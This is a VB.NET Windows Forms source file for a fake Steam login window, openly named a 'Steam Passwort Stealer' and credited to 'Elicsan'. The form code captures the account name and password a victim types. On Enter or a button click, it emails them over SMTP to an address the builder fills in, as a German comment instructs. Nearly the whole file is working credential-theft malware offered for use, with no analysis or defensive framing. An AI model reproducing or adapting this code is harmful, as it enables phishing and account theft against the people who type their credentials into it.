Imports System.Net.Mail
Public Class Form1
    Dim X As String
    Dim Y As String
    Dim P As New System.Drawing.Point

    Private Sub Form1_MouseDown(ByVal sender As Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles Me.MouseDown
        X = MousePosition.X - Me.Location.X
        Y = MousePosition.Y - Me.Location.Y
    End Sub

    Private Sub Form1_MouseMove(ByVal sender As Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles Me.MouseMove
        If e.Button = MouseButtons.Left Then
            P = MousePosition
            P.X = P.X - X
            P.Y = P.Y - Y
            Me.Location = P
        End If
    End Sub

    Private Sub Panel1_MouseDown(ByVal sender As Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles Panel1.MouseDown
        X = MousePosition.X - Me.Location.X
        Y = MousePosition.Y - Me.Location.Y
    End Sub

    Private Sub Panel1_MouseMove(ByVal sender As Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles Panel1.MouseMove
        If e.Button = MouseButtons.Left Then
            P = MousePosition
            P.X = P.X - X
            P.Y = P.Y - Y
            Me.Location = P
        End If
    End Sub

    Private Sub PictureBox1_MouseDown(ByVal sender As Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles PictureBox1.MouseDown
        X = MousePosition.X - Me.Location.X
        Y = MousePosition.Y - Me.Location.Y
    End Sub

    Private Sub PictureBox1_MouseMove(ByVal sender As Object, ByVal e As System.Windows.Forms.MouseEventArgs) Handles PictureBox1.MouseMove
        If e.Button = MouseButtons.Left Then
            P = MousePosition
            P.X = P.X - X
            P.Y = P.Y - Y
            Me.Location = P
        End If
    End Sub

    Private Sub PasswortTextbox_KeyDown(ByVal sender As Object, ByVal e As System.Windows.Forms.KeyEventArgs) Handles PasswortTextbox.KeyDown
        If e.KeyData = Keys.Enter Then
            Me.Enabled = False
            Try
                ' Einfach Mailadresse und euer Passwort eingeben, sowie SMTP-Daten ergänzen. Fertig.
                Dim smtpserver As New SmtpClient
                Dim mail As New MailMessage
                smtpserver.Credentials = New Net.NetworkCredential("Mail", "PW")
                smtpserver.Port = 587 'DEIN PORT
                smtpserver.Host = "SMTP"
                smtpserver.EnableSsl = True
                mail = New MailMessage
                mail.From = New MailAddress("Mail")
                mail.Subject = "Steam Passwort Stealer"
                mail.Body = "Account: " + AccountTextbox.Text + "   " + "Passwort: " + PasswortTextbox.Text
                mail.To.Add("Mail")
                smtpserver.Send(mail)
                Me.Enabled = True
                MSG2.Show()
            Catch ex As Exception
                MSG1.Show()
                Me.Enabled = True
            End Try
        End If
    End Sub

    Private Sub TextBox2_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles PasswortTextbox.TextChanged
        Button2.Enabled = True
    End Sub

    Private Sub Label7_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label7.Click
        End
    End Sub

    Private Sub Label7_MouseHover(ByVal sender As Object, ByVal e As System.EventArgs) Handles Label7.MouseHover
        Label7.ForeColor = Color.Gainsboro
    End Sub

    Private Sub Label7_MouseLeave(ByVal sender As Object, ByVal e As System.EventArgs) Handles Label7.MouseLeave
        Label7.ForeColor = Color.DarkGray
    End Sub

    Private Sub Label8_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Label8.Click
        Me.WindowState = FormWindowState.Minimized
    End Sub

    Private Sub Label8_MouseHover(ByVal sender As Object, ByVal e As System.EventArgs) Handles Label8.MouseHover
        Label8.ForeColor = Color.Gainsboro
    End Sub

    Private Sub Label8_MouseLeave(ByVal sender As Object, ByVal e As System.EventArgs) Handles Label8.MouseLeave
        Label8.ForeColor = Color.DarkGray
    End Sub

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        Me.Enabled = False
        Try
            ' Einfach Mailadresse und euer Passwort eingeben, sowie SMTP-Daten ergänzen. Fertig.
            Dim smtpserver As New SmtpClient
            Dim mail As New MailMessage
            smtpserver.Credentials = New Net.NetworkCredential("Mail", "PW")
            smtpserver.Port = 587 'DEIN PORT
            smtpserver.Host = "SMTP"
            smtpserver.EnableSsl = True
            mail = New MailMessage
            mail.From = New MailAddress("Mail")
            mail.Subject = "Steam Passwort Stealer"
            mail.Body = "Account: " + AccountTextbox.Text + "   " + "Passwort: " + PasswortTextbox.Text
            mail.To.Add("Mail")
            smtpserver.Send(mail)
            Me.Enabled = True
            MSG2.Show()
        Catch ex As Exception
            MSG1.Show()
            Me.Enabled = True
        End Try
    End Sub

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    End Sub
End Class

' Code by Elicsan
